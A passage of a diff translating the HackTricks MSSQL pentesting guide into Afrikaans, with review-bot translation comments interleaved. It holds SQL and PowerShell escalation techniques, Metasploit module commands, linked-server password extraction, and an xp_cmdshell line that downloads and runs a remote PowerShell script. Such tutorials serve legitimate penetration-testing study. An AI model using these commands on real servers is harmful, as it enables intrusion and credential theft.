uitvoer om die lêer te skep: ```bash # Enable Ole Automation Procedures sp_configure 'show advanced options', 1 @@ -300,38 +395,34 @@ EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, ') -Example using configured python to perform several actions: - +Voorbeeld van die gebruik van gekonfigureerde python om verskeie aksies uit te voer: ```sql # Print the user being used (and execute commands) EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())' @@ -345,12 +436,11 @@ print(sys.version) ' GO ``` +### Lees Register -### Read Registry +Microsoft SQL Server bied **verskeie uitgebreide gestoorde prosedures** wat jou in staat stel om te kommunikeer met nie net die netwerk nie, maar ook die lêersisteem en selfs die [**Windows Register**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/)**:** -Microsoft SQL Server provides **multiple extended stored procedures** that allow you to interact with not only the network but also the file system and even the [**Windows Registry**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/)**:** - -| **Regular** | **Instance-Aware** | +| **Gewone** | **Instansie-Bewus** | | ---------------------------- | -------------------------------------- | | sys.xp\_regread | sys.xp\_instance\_regread | | sys.xp\_regenumvalues | sys.xp\_instance\_regenumvalues | @@ -360,7 +450,6 @@ Microsoft SQL Server provides **multiple extended stored procedures** that allow | sys.xp\_regdeletekey | sys.xp\_instance\_regdeletekey | | sys.xp\_regaddmultistring | sys.xp\_instance\_regaddmultistring | | sys.xp\_regremovemultistring | sys.xp\_instance\_regremovemultistring | - ```sql # Example read registry EXECUTE master.sys.xp_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Microsoft SQL Server\MSSQL12.SQL2014\SQLServerAgent', 'WorkingDirectory'; 
@@ -372,34 +461,32 @@ Use master; EXEC sp_helprotect 'xp_regread'; EXEC sp_helprotect 'xp_regwrite'; ``` +Vir **meer voorbeelde** kyk na die [**oorspronklike bron**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/). -For **more examples** check out the [**original source**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/). +### RCE met MSSQL Gebruiker Gedefinieerde Funksie - SQLHttp -### RCE with MSSQL User Defined Function - SQLHttp +Dit is moontlik om 'n .NET dll binne MSSQL te **laai met aangepaste funksies**. Dit vereis egter `dbo` toegang, so jy benodig 'n verbinding met die databasis **as `sa` of 'n Administrateur rol**. -It's possible to **load a .NET dll within MSSQL with custom functions**. This, however, **requires `dbo` access** so you need a connection with database **as `sa` or an Administrator role**. +[**Volg hierdie skakel**](../../pentesting-web/sql-injection/mssql-injection.md#mssql-user-defined-function-sqlhttp) om 'n voorbeeld te sien. -[**Following this link**](../../pentesting-web/sql-injection/mssql-injection.md#mssql-user-defined-function-sqlhttp) to see an example. +### Ander maniere vir RCE -### Other ways for RCE - -There are other methods to get command execution, such as adding [extended stored procedures](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [CLR Assemblies](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [SQL Server Agent Jobs](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15), and [external scripts](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql). 
+Daar is ander metodes om opdrag uitvoering te kry, soos die byvoeging van [uitgebreide gestoorde prosedures](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [CLR-versamelings](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [SQL Server Agent Jobs](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15), en [eksterne skripte](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql).
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) vandag. {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} *** -## MSSQL Privilege Escalation +## MSSQL Bevoorregte Eskalasie -### From db\_owner to sysadmin - -If a **regular user** is given the role **`db_owner`** over the **database owned by an admin** user (such as **`sa`**) and that database is configured as **`trustworthy`**, that user can abuse these privileges to **privesc** because **stored procedures** created in there that can **execute** as the owner (**admin**). +### Van db\_owner tot sysadmin +As 'n **gewone gebruiker** die rol **`db_owner`** oor die **databasis wat deur 'n administrateur** gebruiker besit word (soos **`sa`**) gegee word en daardie databasis is gekonfigureer as **`trustworthy`**, kan daardie gebruiker hierdie voorregte misbruik om **bevoorregte eskalasie** te bewerkstellig omdat **gestoorde prosedures** wat daar geskep is, uitgevoer kan word as die eienaar (**administrateur**). ```sql # Get owners of databases SELECT suser_sname(owner_sid) FROM sys.databases 
@@ -433,25 +520,19 @@ EXEC sp_elevate_me --3. Verify your user is a sysadmin SELECT is_srvrolemember('sysadmin') ``` - -You can use a **metasploit** module: - +Jy kan 'n **metasploit** module gebruik: ```bash msf> use auxiliary/admin/mssql/mssql_escalate_dbowner ``` - -Or a **PS** script: - +Of 'n **PS** skrip: ```powershell # https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-Dbowner.psm1 Import-Module .Invoke-SqlServerDbElevateDbOwner.psm1 Invoke-SqlServerDbElevateDbOwner -SqlUser myappuser -SqlPass MyPassword! -SqlServerInstance 10.2.2.184 ``` +### Impersonasie van ander gebruikers -### Impersonation of other users - -SQL Server has a special permission, named **`IMPERSONATE`**, that **allows the executing user to take on the permissions of another user** or login until the context is reset or the session ends. - +SQL Server het 'n spesiale toestemming, genaamd **`IMPERSONATE`**, wat **die uitvoerende gebruiker toelaat om die toestemmings van 'n ander gebruiker** of aanmelding oor te neem totdat die konteks herstel word of die sessie eindig. ```sql # Find users you can impersonate SELECT distinct b.name @@ -466,13 +547,11 @@ EXECUTE AS LOGIN = 'sa' SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER('sysadmin') ``` - {% hint style="info" %} -If you can impersonate a user, even if he isn't sysadmin, you should check i**f the user has access** to other **databases** or linked servers. +As jy 'n gebruiker kan voorstel, selfs al is hy nie 'n sysadmin nie, moet jy nagaan of die gebruiker toegang het tot ander databasisse of gekoppelde bedieners. {% endhint %} -Note that once you are sysadmin you can impersonate any other one: - +Merk op dat sodra jy 'n sysadmin is, kan jy enige ander een voorstel: ```sql -- Impersonate RegUser EXECUTE AS LOGIN = 'RegUser' 
@@ -482,49 +561,44 @@ SELECT IS_SRVROLEMEMBER('sysadmin') -- Change back to sa REVERT ``` - -You can perform this attack with a **metasploit** module: - +Jy kan hierdie aanval uitvoer met 'n **metasploit** module: ```bash msf> auxiliary/admin/mssql/mssql_escalate_execute_as ``` - -or with a **PS** script: - +of met 'n **PS** skrip: ```powershell # https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-ExecuteAs.psm1 Import-Module .Invoke-SqlServer-Escalate-ExecuteAs.psm1 Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuser1 -SqlPass MyPassword! ``` - -## Using MSSQL for Persistence +## Gebruik van MSSQL vir Volharding [https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/](https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/) -## Extracting passwords from SQL Server Linked Servers -An attacker can extract SQL Server Linked Servers passwords from the SQL Instances and get them in clear text, granting the attacker passwords that can be used to acquire a greater foothold on the target. -The script to extract and decrypt the passwords stored for the Linked Servers can be found [here](https://www.richardswinbank.net/admin/extract_linked_server_passwords) +## Uittrekking van wagwoorde vanaf SQL Server Gekoppelde Bedieners +'n Aanvaller kan SQL Server Gekoppelde Bedieners wagwoorde uittrek uit die SQL-instanties en dit in duidelike teks verkry, wat die aanvaller wagwoorde gee wat gebruik kan word om 'n groter voet aan die doel te kry. +Die skrip om die wagwoorde wat vir die Gekoppelde Bedieners gestoor word, uit te trek en te ontsluit, kan [hier](https://www.richardswinbank.net/admin/extract_linked_server_passwords) gevind word. -Some requirements, and configurations must be done in order for this exploit to work. -First of all, you must have Administrator rights on the machine, or the ability to manage the SQL Server Configurations. 
+Sekere vereistes en konfigurasies moet gedoen word sodat hierdie uitbuitwerk kan werk. +Eerstens moet jy Administrateur-regte op die masjien hê, of die vermoë om die SQL Server-konfigurasies te bestuur. -After validating your permissions, you need to configure three things, which are the following: -1. Enable TCP/IP on the SQL Server instances; -2. Add a Start Up parameter, in this case, a trace flag will be added, which is -T7806. -3. Enable remote admin connection. +Nadat jou regte geverifieer is, moet jy drie dinge konfigureer, naamlik: +1. Skakel TCP/IP in op die SQL Server-instanties; +2. Voeg 'n Beginparameter by, in hierdie geval sal 'n spoorvlag bygevoeg word, naamlik -T7806. +3. Skakel die afgeleë administratiewe verbinding in. -To automate these configurations, [this repository ](https://github.com/IamLeandrooooo/SQLServerLinkedServersPasswords/) has the needed scripts. -Besides having a powershell script for each step of the configuration, the repository also has a full script which combines the configuration scripts and the extraction and decryption of the passwords. +Om hierdie konfigurasies outomaties te maak, het [hierdie bewaarplek](https://github.com/IamLeandrooooo/SQLServerLinkedServersPasswords/) die nodige skripte. +Behalwe dat daar 'n PowerShell-skrip vir elke stap van die konfigurasie is, het die bewaarplek ook 'n volledige skrip wat die konfigurasieskripte en die uittrekking en ontsluiting van die wagwoorde kombineer. 
-For further information, refer to the following links regarding this attack: -[Decrypting MSSQL Database Link Server Passwords](https://www.netspi.com/blog/technical/adversary-simulation/decrypting-mssql-database-link-server-passwords/) +Vir verdere inligting, verwys na die volgende skakels met betrekking tot hierdie aanval: +[Ontsluiting van MSSQL-databasis Gekoppelde Bediener Wagwoorde](https://www.netspi.com/blog/technical/adversary-simulation/decrypting-mssql-database-link-server-passwords/) -[Troubleshooting the SQL Server Dedicated Administrator Connection](https://www.mssqltips.com/sqlservertip/5364/troubleshooting-the-sql-server-dedicated-administrator-connection/) +[Foutopsporing van die SQL Server Toegewyde Administratiewe Verbinding](https://www.mssqltips.com/sqlservertip/5364/troubleshooting-the-sql-server-dedicated-administrator-connection/) -## Local Privilege Escalation +## Plaaslike Bevoorregte Eskalasie -The user running MSSQL server will have enabled the privilege token **SeImpersonatePrivilege.**\ -You probably will be able to **escalate to Administrator** following one of these 2 paged: +Die gebruiker wat die MSSQL-bediener hardloop, sal die voorregtoken **SeImpersonatePrivilege** geaktiveer hê.\ +Jy sal waarskynlik kan **eskaleer na Administrateur** deur een van hierdie 2 bladsye te volg: {% content-ref url="../../windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md" %} [roguepotato-and-printspoofer.md](../../windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md) 
@@ -538,7 +612,7 @@ You probably will be able to **escalate to Administrator** following one of thes * `port:1433 !HTTP` -## References +## Verwysings * [https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users](https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users) * [https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/](https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/) @@ -552,80 +626,78 @@ You probably will be able to **escalate to Administrator** following one of thes
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} *** -## HackTricks Automatic Commands - +## HackTricks Outomatiese Opdragte ``` Protocol_Name: MSSQL #Protocol Abbreviation if there is one. Port_Number: 1433 #Comma separated if there is more than one. Protocol_Description: Microsoft SQL Server #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for MSSQL - Note: | - Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet). +Name: Notes +Description: Notes for MSSQL +Note: | +Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet). 
- #sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G +#sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G - ###the goal is to get xp_cmdshell working### - 1. try and see if it works - xp_cmdshell `whoami` - go +###the goal is to get xp_cmdshell working### +1. try and see if it works +xp_cmdshell `whoami` +go - 2. try to turn component back on - EXEC SP_CONFIGURE 'xp_cmdshell' , 1 - reconfigure - go - xp_cmdshell `whoami` - go +2. try to turn component back on +EXEC SP_CONFIGURE 'xp_cmdshell' , 1 +reconfigure +go +xp_cmdshell `whoami` +go - 3. 'advanced' turn it back on - EXEC SP_CONFIGURE 'show advanced options', 1 - reconfigure - go - EXEC SP_CONFIGURE 'xp_cmdshell' , 1 - reconfigure - go - xp_cmdshell 'whoami' - go +3. 'advanced' turn it back on +EXEC SP_CONFIGURE 'show advanced options', 1 +reconfigure +go +EXEC SP_CONFIGURE 'xp_cmdshell' , 1 +reconfigure +go +xp_cmdshell 'whoami' +go - xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://10.10.14.60:8000/ye443.ps1')" +xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://10.10.14.60:8000/ye443.ps1')" - https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server +https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server Entry_2: - Name: Nmap for SQL - Description: Nmap with SQL Scripts - Command: nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 {IP} - -Entry_3: - Name: MSSQL consolesless mfs enumeration - Description: MSSQL enumeration without the need to run msfconsole - Note: sourced from https://github.com/carlospolop/legion - Command: msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_ping; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use 
auxiliary/admin/mssql/mssql_enum; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use admin/mssql/mssql_enum_domain_accounts; set RHOSTS {IP}; set RPORT ; run; exit' &&msfconsole -q -x 'use admin/mssql/mssql_enum_sql_logins; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_dbowner; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_execute_as; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_exec; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_findandsampledata; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_hashdump; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_schemadump; set RHOSTS {IP}; set RPORT ; run; exit' - -``` +Name: Nmap for SQL +Description: Nmap with SQL Scripts +Command: nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 {IP} +Entry_3: +Name: MSSQL consolesless mfs enumeration +Description: MSSQL enumeration without the need to run msfconsole +Note: sourced from https://github.com/carlospolop/legion +Command: msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_ping; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_enum; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use admin/mssql/mssql_enum_domain_accounts; set RHOSTS {IP}; set RPORT ; run; exit' &&msfconsole -q -x 'use admin/mssql/mssql_enum_sql_logins; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_dbowner; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q 
-x 'use auxiliary/admin/mssql/mssql_escalate_execute_as; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_exec; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_findandsampledata; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_hashdump; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_schemadump; set RHOSTS {IP}; set RPORT ; run; exit' + +```
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
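Review bot: the blank line between the last table row (`sys.xp\_regremovemultistring`) and the ```sql fence is deleted in hunk @@ -360,7 +450,6 @@ with no `+` counterpart; without that separator some Markdown renderers continue the table into the fence line, so the "Example read registry" block can be parsed as part of the table. Keep the blank line as in the English source.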
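Review bot: the blank lines that separate "Jy kan 'n **metasploit** module gebruik:" and "Of 'n **PS** skrip:" from the ```bash and ```powershell fences are dropped in hunk @@ -433,25 +520,19 @@ (the removed `-` blank lines have no `+` replacement); the same pattern appears in @@ -300,38 +395,34 @@, @@ -466,13 +547,11 @@ and @@ -482,49 +561,44 @@. The translation should preserve the source's blank lines around fences so the rendered layout matches the English page.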
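Review bot: the translated hint in hunk @@ -466,13 +547,11 @@ drops the bold emphasis of the source line ("i**f the user has access** to other **databases**"); the source's misplaced marker should be corrected to "**if the user has access**" and the emphasis carried over into the Afrikaans line rather than removed. "voorstel" reads as "propose" or "introduce"; "jou voordoen as 'n gebruiker" matches the section heading "Impersonasie".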
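Review bot: wording in hunk @@ -482,49 +561,44 @@: "sodat hierdie uitbuitwerk kan werk" contains a non-word ("uitbuitwerk") and a doubled "werk", and "'n groter voet aan die doel te kry" is a word-for-word rendering of "a greater foothold on the target"; suggest "sodat hierdie uitbuiting kan werk" and "'n sterker vastrapplek op die teiken te kry". In the numbered list, "Skakel die afgeleë administratiewe verbinding in" should keep the English setting name "remote admin connection" in parentheses, since that is what the reader has to look for in the server configuration and it ties the step to the Dedicated Administrator Connection link below it.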
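Review bot: the fenced block under "HackTricks Outomatiese Opdragte" in hunk @@ -552,80 +626,78 @@ has lost the leading indentation of every line beneath `Entry_1:`, `Entry_2:` and `Entry_3:` (for example `  Name: Notes` became `Name: Notes`, and the multi-line text under `Note: |` is no longer indented), so the `Note: |` literal block becomes empty and the entries no longer parse as nested YAML-style records; the blank line separating `Entry_2:` from `Entry_3:` is also gone. Only the heading is translatable here; the block content should be restored byte-for-byte from the English source, since tooling that consumes these entries depends on the indentation.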
diff --git a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md index 69b77ec81..015ee4d73 100644 --- a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md +++ b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md @@ -1,45 +1,45 @@ -# Types of MSSQL Users +# Tipes van MSSQL-gebruikers
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-Table taken from the [**docs**](https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-database-principals-transact-sql?view=sql-server-ver16). +Tabel geneem van die [**dokumentasie**](https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-database-principals-transact-sql?view=sql-server-ver16). -| Column name | Data type | Description | -| ------------------------------------------ | ----------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | -| **name** | **sysname** | Name of principal, unique within the database. | -| **principal\_id** | **int** | ID of principal, unique within the database. | -| **type** | **char(1)** |

Principal type:

A = Application role

C = User mapped to a certificate

E = External user from Azure Active Directory

G = Windows group

K = User mapped to an asymmetric key

R = Database role

S = SQL user

U = Windows user

X = External group from Azure Active Directory group or applications

| -| **type\_desc** | **nvarchar(60)** |

Description of principal type.

APPLICATION_ROLE

CERTIFICATE_MAPPED_USER

EXTERNAL_USER

WINDOWS_GROUP

ASYMMETRIC_KEY_MAPPED_USER

DATABASE_ROLE

SQL_USER

WINDOWS_USER

EXTERNAL_GROUPS

| -| **default\_schema\_name** | **sysname** | Name to be used when SQL name does not specify a schema. Null for principals not of type S, U, or A. | -| **create\_date** | **datetime** | Time at which the principal was created. | -| **modify\_date** | **datetime** | Time at which the principal was last modified. | -| **owning\_principal\_id** | **int** | ID of the principal that owns this principal. All fixed Database Roles are owned by **dbo** by default. | -| **sid** | **varbinary(85)** | SID (Security Identifier) of the principal. NULL for SYS and INFORMATION SCHEMAS. | -| **is\_fixed\_role** | **bit** | If 1, this row represents an entry for one of the fixed database roles: db\_owner, db\_accessadmin, db\_datareader, db\_datawriter, db\_ddladmin, db\_securityadmin, db\_backupoperator, db\_denydatareader, db\_denydatawriter. | -| **authentication\_type** | **int** |

Applies to: SQL Server 2012 (11.x) and later.

Signifies authentication type. The following are the possible values and their descriptions.

0 : No authentication
1 : Instance authentication
2 : Database authentication
3 : Windows authentication
4 : Azure Active Directory authentication

| -| **authentication\_type\_desc** | **nvarchar(60)** |

Applies to: SQL Server 2012 (11.x) and later.

Description of the authentication type. The following are the possible values and their descriptions.

NONE : No authentication
INSTANCE : Instance authentication
DATABASE : Database authentication
WINDOWS : Windows authentication
EXTERNAL: Azure Active Directory authentication

| -| **default\_language\_name** | **sysname** |

Applies to: SQL Server 2012 (11.x) and later.

Signifies the default language for this principal.

| -| **default\_language\_lcid** | **int** |

Applies to: SQL Server 2012 (11.x) and later.

Signifies the default LCID for this principal.

| -| **allow\_encrypted\_value\_modifications** | **bit** |

Applies to: SQL Server 2016 (13.x) and later, SQL Database.

Suppresses cryptographic metadata checks on the server in bulk copy operations. This enables the user to bulk copy data encrypted using Always Encrypted, between tables or databases, without decrypting the data. The default is OFF.

| +| Kolomnaam | Datatipe | Beskrywing | +| ----------------------------------------- | ----------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | +| **name** | **sysname** | Naam van die beginsel, uniek binne die databasis. | +| **principal\_id** | **int** | ID van die beginsel, uniek binne die databasis. | +| **type** | **char(1)** |

Beginsel tipe:

A = Toepassingsrol

C = Gebruiker gekoppel aan 'n sertifikaat

E = Eksterne gebruiker vanuit Azure Active Directory

G = Windows-groep

K = Gebruiker gekoppel aan 'n asimmetriese sleutel

R = Databasisrol

S = SQL-gebruiker

U = Windows-gebruiker

X = Eksterne groep vanuit Azure Active Directory-groep of toepassings

| +| **type\_desc** | **nvarchar(60)** |

Beskrywing van beginsel tipe.

APPLICATION_ROLE

CERTIFICATE_MAPPED_USER

EXTERNAL_USER

WINDOWS_GROUP

ASYMMETRIC_KEY_MAPPED_USER

DATABASE_ROLE

SQL_USER

WINDOWS_USER

EXTERNAL_GROUPS

| +| **default\_schema\_name** | **sysname** | Naam wat gebruik moet word wanneer die SQL-naam nie 'n skema spesifiseer nie. Nul vir beginsels wat nie van die tipe S, U of A is nie. | +| **create\_date** | **datetime** | Tyd waarop die beginsel geskep is. | +| **modify\_date** | **datetime** | Tyd waarop die beginsel laas gewysig is. | +| **owning\_principal\_id** | **int** | ID van die beginsel wat hierdie beginsel besit. Alle vaste databasisrolle word standaard besit deur **dbo**. | +| **sid** | **varbinary(85)** | SID (Security Identifier) van die beginsel. Nul vir SYS en INFORMATION SCHEMAS. | +| **is\_fixed\_role** | **bit** | Indien 1, verteenwoordig hierdie ry 'n inskrywing vir een van die vaste databasisrolle: db\_owner, db\_accessadmin, db\_datareader, db\_datawriter, db\_ddladmin, db\_securityadmin, db\_backupoperator, db\_denydatareader, db\_denydatawriter. | +| **authentication\_type** | **int** |

Van toepassing op: SQL Server 2012 (11.x) en later.

Dui op die tipe outentifikasie. Die volgende is die moontlike waardes en hul beskrywings.

0 : Geen outentifikasie
1 : Instansie-outentifikasie
2 : Databasis-outentifikasie
3 : Windows-outentifikasie
4 : Azure Active Directory-outentifikasie

| +| **authentication\_type\_desc** | **nvarchar(60)** |

Van toepassing op: SQL Server 2012 (11.x) en later.

Beskrywing van die outentifikasie tipe. Die volgende is die moontlike waardes en hul beskrywings.

NONE : Geen outentifikasie
INSTANCE : Instansie-outentifikasie
DATABASE : Databasis-outentifikasie
WINDOWS : Windows-outentifikasie
EXTERNAL: Azure Active Directory-outentifikasie

| +| **default\_language\_name** | **sysname** |

Van toepassing op: SQL Server 2012 (11.x) en later.

Dui die verstektaal vir hierdie beginsel aan.

